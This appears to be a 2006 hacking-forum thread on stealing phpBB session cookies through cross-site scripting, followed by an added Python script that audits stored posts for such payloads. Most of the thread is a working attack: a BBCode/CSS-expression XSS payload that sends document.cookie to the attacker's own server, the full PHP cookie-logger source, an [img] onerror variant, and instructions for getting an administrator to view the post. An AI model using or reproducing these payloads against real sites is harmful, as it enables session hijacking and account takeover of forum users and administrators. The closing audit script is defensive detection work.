IT Security and Insecurity Portal

Cookie Man, 2.0.16 xss

Posted: Thu Apr 27, 2006 6:49 pm
Bill324
Regular user
Joined: Apr 07, 2006
Posts: 11

Hey,
I just need a little matter cleared up.
On the phpBB 2.0.16 cookie stealer thingy, the code looks something like this:
Code:
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://mysite/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]
I'm just not sure what web addresses I change, say if I was attacking www.teletubbies.com, would I change the script to http://teletubbies.com/cookies.php?
Or do I use my own website?
Many thanks,
-Earnshaw

Posted: Thu Apr 27, 2006 9:32 pm
Chb
Valuable expert
Joined: Jul 23, 2005
Posts: 206
Location: Germany

To your cookie-logging script, of course. -> Your site.
Or how do you get the script into the directory of the victim's site?

Posted: Sat Apr 29, 2006 6:36 am
Bill324
Regular user
Joined: Apr 07, 2006
Posts: 11

I did it but...
It just like appeared...with the code.

Posted: Sat Apr 29, 2006 7:36 pm
johnny
Regular user
Joined: Mar 13, 2006
Posts: 13

You have to have cookies.php on your own website. The code for it is
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("m/d/Y g:i:s a");
$referer=getenv ('HTTP_REFERER');
$fl = fopen('log.txt', 'a');
fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
fclose($fl);
?>
And you need log.txt on the same website. Both of these files should be in the same directory and have write access and execute access (chmod 777).
Then you change the code that you posted to point to your own website.
Then paste the code into a PM or a post on the target website. When an admin running IE for Windows with autologin on views the post, his cookie will be copied into the file log.txt on your website.

Posted: Wed May 03, 2006 11:58 am
pasching
Regular user
Joined: May 03, 2006
Posts: 8

I use the same cookies.php; the difference is that I use the [img] exploit.
The only problem is, how do I get him to read the cookie data?
I know it's supposed to be stored in document.cookie, but if I do [img]http://www.mywebspace.com/cookies.php?c=document.cookie[/img], then in my log text there's
Cookie: document.cookie
IP: 217.111.50.190
Date and Time: 3 May, 2006, 1:32 pm
Referer: http://www.blabla.com/board/posting.php4?mode=topicreview&t=136498
It probably needs JavaScript code to read it out.
Any advice?

Posted: Wed May 03, 2006 6:48 pm
Chb
Valuable expert
Joined: Jul 23, 2005
Posts: 206
Location: Germany

pasching wrote:
I use the same cookies.php; the difference is that I use the [img] exploit.
The only problem is, how do I get him to read the cookie data?
I know it's supposed to be stored in document.cookie, but if I do [img]http://www.mywebspace.com/cookies.php?c=document.cookie[/img], then in my log text there's
Cookie: document.cookie
IP: 217.111.50.190
Date and Time: 3 May, 2006, 1:32 pm
Referer: http://www.blabla.com/board/posting.php4?mode=topicreview&t=136498
It probably needs JavaScript code to read it out.
Any advice?

You need XSS (Cross Site Scripting), which means the possibility to inject your own HTML code, to do this.
Otherwise your JavaScript code won't be executed.

Posted: Thu May 04, 2006 12:25 am
pasching
Regular user
Joined: May 03, 2006
Posts: 8

Hehe, that's not the problem; this is an old 2.0.0 board where you can execute your own code between the img tags.
Old exploit, worked till 2.0.8 or so.
Anyway, as you can see I can already get the IP address and referer of the target (or, the person who reads my post).
I can also do what's explained here -> http://marc.theaimsgroup.com/?l=bugtraq&m=102253327105538&w=2, do a [img]http://a.a/a"onerror="javascript:alert(document.cookie)[/img] and it does a popup with my cookie data.
So executing code works fine, I just need the correct code for executing my cookies.php.
Thanks, greets
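
A defender's view of the two payload shapes seen in this thread, as an added example that is not part of any post: a Python audit that scans stored post bodies for [img]/[url] arguments that are not plain URLs. The rule list, function names and sample rows are assumptions made for illustration.

```python
import re

# Argument of [img]...[/img], [url]...[/url] or [url=...]: the text a board
# copies into an HTML src/href attribute when it renders the post.
BBCODE_ARG = re.compile(
    r"\[img\](.*?)\[/img\]|\[url\](.*?)\[/url\]|\[url=([^\]]*)\]",
    re.IGNORECASE | re.DOTALL,
)

# Each rule names one way an argument stops being a plain URL.
RULES = [
    ("attribute breakout character", re.compile(r"[\"'`<>\s]")),
    ("inline event handler", re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE)),
    ("CSS expression()", re.compile(r"expression\s*\(", re.IGNORECASE)),
    ("script-scheme URL", re.compile(r"(?:java|vb)script\s*:", re.IGNORECASE)),
    ("nested BBCode tag", re.compile(r"\[")),
]


def audit_post(body):
    """Return a sorted list of rule names triggered by any tag argument in body."""
    hits = set()
    for match in BBCODE_ARG.finditer(body):
        arg = next(g for g in match.groups() if g is not None)
        hits.update(name for name, rx in RULES if rx.search(arg))
    return sorted(hits)


def audit_posts(posts):
    """Map post id -> findings, keeping only posts that triggered a rule."""
    return {pid: f for pid, body in posts.items() if (f := audit_post(body))}


# Constructed sample rows (post id -> stored BBCode); not data from the thread.
SAMPLE_POSTS = {
    101: "nice pic [img]http://example.invalid/cat.png[/img]",
    102: '[img]http://example.invalid/a"onerror="x[/img]',
    103: "[url=www.s=''style='top:expression(1)'][/url]",
    104: "[img]http://example.invalid/log.php?c=document.cookie[/img]",
}

if __name__ == "__main__":
    for pid, findings in audit_posts(SAMPLE_POSTS).items():
        print(pid, findings)
```

Row 104 is not flagged: a plain [img] URL runs no script, which matches the log above showing the literal text document.cookie. It still makes the reader's browser send its IP and Referer to the image host, so off-site images are a separate policy decision.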
www.waraxe.us Forum Index -> PhpBB
All times are GMT